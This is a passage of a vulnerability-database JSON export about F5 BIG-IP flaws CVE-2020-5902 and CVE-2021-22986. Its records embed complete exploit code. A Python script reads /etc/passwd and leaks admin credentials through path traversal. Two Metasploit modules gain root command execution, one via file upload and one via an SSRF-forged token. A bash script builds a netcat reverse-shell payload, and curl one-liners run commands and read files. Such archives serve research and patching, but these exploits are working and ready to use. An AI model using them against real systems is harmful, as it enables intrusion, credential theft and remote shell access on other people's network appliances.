"2020-07-27T00:00:00", "type": "zdt", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-27T00:00:00", "id": "1337DAY-ID-34748", "href": "https://0day.today/exploit/description/34748", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)\n\n# 0day.today [2020-07-27] #", "sourceHref": "https://0day.today/exploit/34748", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-02T09:27:35", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34652", "href": "https://0day.today/exploit/description/34652", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',\n 'Description' => %q{\n This module exploits a directory traversal in F5's BIG-IP Traffic\n Management User Interface (TMUI) to upload a shell script and execute\n it as the root user.\n\n Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,\n 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced\n in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.\n\n Tested on the VMware OVA release of 14.1.2.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-5902'],\n ['URL', 'https://support.f5.com/csp/article/K52145254'],\n ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']\n ],\n 'DisclosureDate' => '2020-06-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n }\n ],\n [\n 'Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 5\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service\n 'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),\n 'vars_post' => {\n 'fileName' => '/etc/f5-release'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body\n return CheckCode::Safe('Target did not respond with BIG-IP version.')\n end\n\n # If we got here, the directory traversal was successful\n CheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\")\n end\n\n def exploit\n create_alias\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n\n delete_alias if @created_alias\n end\n\n def create_alias\n print_status('Creating alias list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'create cli alias private list command bash'\n }\n )\n\n unless res && res.code == 200 && res.get_json_document['error'].blank?\n fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')\n end\n\n @created_alias = true\n\n print_good('Successfully created alias list=bash')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n upload_script(cmd)\n execute_script\n end\n\n def upload_script(cmd)\n print_status(\"Uploading #{script_path}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),\n 'vars_post' => {\n 'fileName' => script_path,\n 'content' => cmd\n }\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\")\n end\n\n register_file_for_cleanup(script_path)\n\n print_good(\"Successfully uploaded #{script_path}\")\n end\n\n def execute_script\n print_status(\"Executing #{script_path}\")\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => \"list #{script_path}\"\n }\n }, 3.5)\n end\n\n def delete_alias\n print_status('Deleting alias list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'delete cli alias private list'\n }\n )\n\n unless res && res.code == 200 && res.get_json_document['error'].blank?\n print_warning('Failed to delete alias list=bash')\n return\n end\n\n print_good('Successfully deleted alias list=bash')\n end\n\n def dir_trav(path)\n # PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\">\n normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)\n end\n\n def script_path\n @script_path ||=\n normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34652", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-20T04:48:46", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34646", "href": "https://0day.today/exploit/description/34646", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. \\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-20T04:49:16", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34647", "href": "https://0day.today/exploit/description/34647", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:37:41", "description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T19:02:32", "type": "metasploit", "title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-06-03T01:32:47", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rest_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\n device. This vulnerability is known as CVE-2021-22986.\n\n CVE-2021-22986 affects the following BIG-IP versions:\n\n * 12.1.0 - 12.1.5\n * 13.1.0 - 13.1.3\n * 14.1.0 - 14.1.3\n * 15.1.0 - 15.1.2\n * 16.0.0 - 16.0.1\n\n And the following BIG-IQ versions:\n\n * 6.0.0 - 6.1.0\n * 7.0.0\n * 7.1.0\n\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n },\n 'Author' => [\n 'wvu', # Analysis and exploit\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\n ],\n 'References' => [\n ['CVE', '2021-22986'],\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n ],\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def user_reference_endpoint\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\n end\n\n def check\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@token ||= generate_token_ssrf)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def generate_token_ssrf\n print_status('Generating token via SSRF...')\n vprint_status(\"Username: #{username}\")\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'ctype' => 'application/json',\n 'data' => {\n 'username' => username,\n 'bigipAuthCookie' => '',\n 'authProviderName' => 'local',\n 'loginReference' => {\n 'link' => \"https://localhost#{login_reference_endpoint}\"\n },\n 'userReference' => {\n 'link' => \"https://localhost#{user_reference_endpoint}\"\n }\n }.to_json\n )\n\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\n print_error('Failed to generate token')\n return\n end\n\n print_good(\"Successfully generated token: #{@token}\")\n @token\n end\n\n def execute_command(cmd, _opts = {})\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n\n print_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'X-F5-Auth-Token' => @token\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n json = res.get_json_document\n\n unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = json['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def login_reference_endpoint\n if datastore['ENDPOINT']\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\n end\n\n @token_generation_endpoint ||= token_generation_endpoints.sample\n\n normalize_uri(target_uri.path, @token_generation_endpoint)\n end\n\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\n def token_generation_endpoints\n %w[\n /access/file-path-manager/indexing\n /cm/autodeploy/cluster-software-images/indexing\n /cm/autodeploy/qkview/indexing\n /cm/autodeploy/software-images/indexing\n /cm/autodeploy/software-volume-install/indexing\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\n /cm/system/authn/providers/tmos/indexing\n /mgmt/shared/analytics/avr-proxy-tasks\n /mgmt/shared/gossip\n /mgmt/shared/gossip-peer-refresher\n /mgmt/shared/identified-devices/config/device-refresh\n /mgmt/shared/save-config\n /mgmt/tm/shared/bigip-failover-state\n /shared/analytics/avr-proxy-tasks\n /shared/analytics/avr-proxy-tasks/indexing\n /shared/analytics/event-aggregation-tasks/indexing\n /shared/analytics/event-analysis-tasks/indexing\n /shared/authn/providers/local/groups/indexing\n /shared/authz/remote-resources/indexing\n /shared/authz/resource-groups/indexing\n /shared/authz/roles/indexing\n /shared/authz/tokens/indexing\n /shared/chassis-framework-upgrades/indexing\n /shared/device-discovery-tasks/indexing\n /shared/device-group-key-pairs/indexing\n /shared/echo/indexing\n /shared/framework-info-tasks/indexing\n /shared/framework-upgrades/indexing\n /shared/gossip\n /shared/gossip-peer-refresher\n /shared/group-task/indexing\n /shared/iapp/blocks/indexing\n /shared/iapp/build-package/indexing\n /shared/iapp/health-prefix-map/indexing\n /shared/iapp/package-management-tasks/indexing\n /shared/iapp/template-loader/indexing\n /shared/identified-devices/config/device-refresh\n /shared/nodejs/loader-path-config/indexing\n /shared/package-deployments/indexing\n /shared/resolver/device-groups/indexing\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\n /shared/root-framework-upgrades/indexing\n /shared/rpm-tasks/indexing\n /shared/save-config\n /shared/snapshot-task/indexing\n /shared/snapshot/indexing\n /shared/stats-information/indexing\n /shared/storage/tasks/indexing\n /shared/task-scheduler/scheduler/indexing\n /shared/tmsh-shell/indexing\n /tm/analytics/afm-sweeper/generate-report/indexing\n /tm/analytics/afm-sweeper/report-results/indexing\n /tm/analytics/application-security-anomalies/generate-report/indexing\n /tm/analytics/application-security-anomalies/report-results/indexing\n /tm/analytics/application-security-network/generate-report/indexing\n /tm/analytics/application-security-network/report-results/indexing\n /tm/analytics/application-security/generate-report/indexing\n /tm/analytics/application-security/report-results/indexing\n /tm/analytics/asm-bypass/generate-report/indexing\n /tm/analytics/asm-bypass/report-results/indexing\n /tm/analytics/asm-cpu/generate-report/indexing\n /tm/analytics/asm-cpu/report-results/indexing\n /tm/analytics/asm-memory/generate-report/indexing\n /tm/analytics/asm-memory/report-results/indexing\n /tm/analytics/cpu/generate-report/indexing\n /tm/analytics/cpu/report-results/indexing\n /tm/analytics/disk-info/generate-report/indexing\n /tm/analytics/disk-info/report-results/indexing\n /tm/analytics/dns/generate-report/indexing\n /tm/analytics/dns/report-results/indexing\n /tm/analytics/dos-l3/generate-report/indexing\n /tm/analytics/dos-l3/report-results/indexing\n /tm/analytics/http/generate-report/indexing\n /tm/analytics/http/report-results/indexing\n /tm/analytics/ip-intelligence/generate-report/indexing\n /tm/analytics/ip-intelligence/report-results/indexing\n /tm/analytics/ip-layer/generate-report/indexing\n /tm/analytics/ip-layer/report-results/indexing\n /tm/analytics/lsn-pool/generate-report/indexing\n /tm/analytics/lsn-pool/report-results/indexing\n /tm/analytics/memory/generate-report/indexing\n /tm/analytics/memory/report-results/indexing\n /tm/analytics/network/generate-report/indexing\n /tm/analytics/network/report-results/indexing\n /tm/analytics/pem/generate-report/indexing\n /tm/analytics/pem/report-results/indexing\n /tm/analytics/proc-cpu/generate-report/indexing\n /tm/analytics/proc-cpu/report-results/indexing\n /tm/analytics/protocol-security-http/generate-report/indexing\n /tm/analytics/protocol-security-http/report-results/indexing\n /tm/analytics/protocol-security/generate-report/indexing\n /tm/analytics/protocol-security/report-results/indexing\n /tm/analytics/sip/generate-report/indexing\n /tm/analytics/sip/report-results/indexing\n /tm/analytics/swg-blocked/generate-report/indexing\n /tm/analytics/swg-blocked/report-results/indexing\n /tm/analytics/swg/generate-report/indexing\n /tm/analytics/swg/report-results/indexing\n /tm/analytics/tcp-analytics/generate-report/indexing\n /tm/analytics/tcp-analytics/report-results/indexing\n /tm/analytics/tcp/generate-report/indexing\n /tm/analytics/tcp/report-results/indexing\n /tm/analytics/udp/generate-report/indexing\n /tm/analytics/udp/report-results/indexing\n /tm/analytics/vcmp/generate-report/indexing\n /tm/analytics/vcmp/report-results/indexing\n /tm/analytics/virtual/generate-report/indexing\n /tm/analytics/virtual/report-results/indexing\n /tm/shared/bigip-failover-state\n /tm/shared/sys/backup/indexing\n ]\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The iControl REST interface has an unauthenticated remote command execution vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "F5 iControl REST unauthenticated Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22986", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", "cvss3": {"exploitabilityScore": 3.9, 